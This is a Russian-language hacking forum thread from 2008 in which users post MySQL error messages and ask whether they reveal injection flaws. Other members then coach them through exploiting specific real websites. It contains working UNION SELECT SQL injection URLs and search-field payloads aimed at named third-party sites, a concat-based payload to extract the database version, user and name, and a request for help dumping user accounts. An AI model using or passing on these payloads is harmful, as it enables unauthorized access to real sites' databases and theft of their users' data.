05.07.2008, 15:49
|
|
Участник форума
Регистрация: 19.12.2006
Сообщений: 173
С нами:
10207764
Репутация:
125
|
|
mySQL query error: INSERT INTO ibf_pfields_content (field_1,field_2,field_3,field_4,member_id) VALUES('от верблюда-\','l','','',7463)
mySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'l','','',7463)' at line 1
mySQL error code:
Date: Saturday 05th 2008f July 2008 03:39:04 PM
подскажите это уязвимость?)))))))прошу не обзываться)
вообщем если уязвимость то
вызвало её вот это при регистрации
в личку могу сказать некоторым где это) 
Последний раз редактировалось P(i)n*Fl0p1; 05.07.2008 в 16:00..
|
|
|
05.07.2008, 22:13
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами:
11020706
Репутация:
4693
|
|
Сообщение от P(i)n*Fl0p1
mySQL query error: INSERT INTO ibf_pfields_content (field_1,field_2,field_3,field_4,member_id) VALUES('от верблюда-\','l','','',7463)
подскажите это уязвимость?)))))))
И вполне уязвимость, ошибка т.к. ты заэкранировал '. Попробуй передать \' , и посмотри что будет, вполне возможно, что кавычка будет экранироваться, но ты это экранирование убъёшь при помощи \., т.е. получится \\' , а значит ' - будет частью команды SQL, а не просто текстовым символом.
А может и ' не заэкранируется вообще, тогда ещё проще.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
05.07.2008, 16:02
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
Не уязвимость. Просто ошибка. Что то ты с синтаксисом намудрил
|
|
|
|
06.07.2008, 03:08
|
|
Banned
Регистрация: 12.11.2007
Сообщений: 20
С нами:
9735501
Репутация:
5
|
|
http://www.blackgospelpromo.com/viewpromo.php?promo_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16/*
Не могу работать с 1 колонкой как выводить юзеров я даж не представляю
ЗЫ глядим в заголовок
|
|
|
|
06.07.2008, 03:15
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами:
9454841
Репутация:
504
|
|
Сообщение от Flash-ICE
http://www.blackgospelpromo.com/viewpromo.php?promo_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16/*
Не могу работать с 1 колонкой как выводить юзеров я даж не представляю
ЗЫ глядим в заголовок
исполбзуй конструкцию concat, например так:
http://www.blackgospelpromo.com/viewpromo.php?promo_id=-1+union+select+1,2,concat(version(),0x3a3a,user(), 0x3a3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,1 6/*
|
|
|
|
06.07.2008, 04:15
|
|
Banned
Регистрация: 12.11.2007
Сообщений: 20
С нами:
9735501
Репутация:
5
|
|
а как ее юзать??? Точнее почему иногда ставиться в скобках 0x3a3a или shar (58) Где про это можно почитать
|
|
|
|
06.07.2008, 04:26
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами:
9799586
Репутация:
1385
|
|
Сообщение от Flash-ICE
а как ее юзать??? Точнее почему иногда ставиться в скобках 0x3a3a или shar (58) Где про это можно почитать
0x3a3a - это шестнадцтиричный код без 0x ..
shar (58) - пишется char(58) - 58 это ascii код двоеточия :
как я понял тебе интересно зачем это используется в скулях - так вот - это пишут для разделения полученых данных ..
0x3a ничем не отличается от char(58) ..
Последний раз редактировалось 159932; 06.07.2008 в 04:30..
|
|
|
|
06.07.2008, 06:00
|
|
Новичок
Регистрация: 02.07.2008
Сообщений: 1
С нами:
9398984
Репутация:
0
|
|
В поиске _http://investoru.info пишу '... вылазит:
'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') and (hl_listings.expiration = 0 || date_a' at line 13'
Это уязвимость?
|
|
|
|
06.07.2008, 06:59
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от teen4jump
В поиске _http://investoru.info пишу '... вылазит:
'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') and (hl_listings.expiration = 0 || date_a' at line 13'
Это уязвимость?
Да, простенькая инъекция, введи в поиске:
Код:
1') union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
29 поле выводится
__________________
Карфаген должен быть разрушен...
|
|
|
|
06.07.2008, 10:27
|
|
Banned
Регистрация: 12.11.2007
Сообщений: 20
С нами:
9735501
Репутация:
5
|
|
gisTy чет не допонял как вывести все таки можешь намекнешь?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
